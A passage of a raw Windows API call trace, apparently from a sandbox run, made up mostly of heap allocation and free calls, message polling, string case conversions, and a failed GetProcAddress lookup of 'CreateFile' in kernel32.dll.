HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.116] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.116] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.118] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.119] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.121] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.124] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c808 [0036.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c808, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.124] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.124] 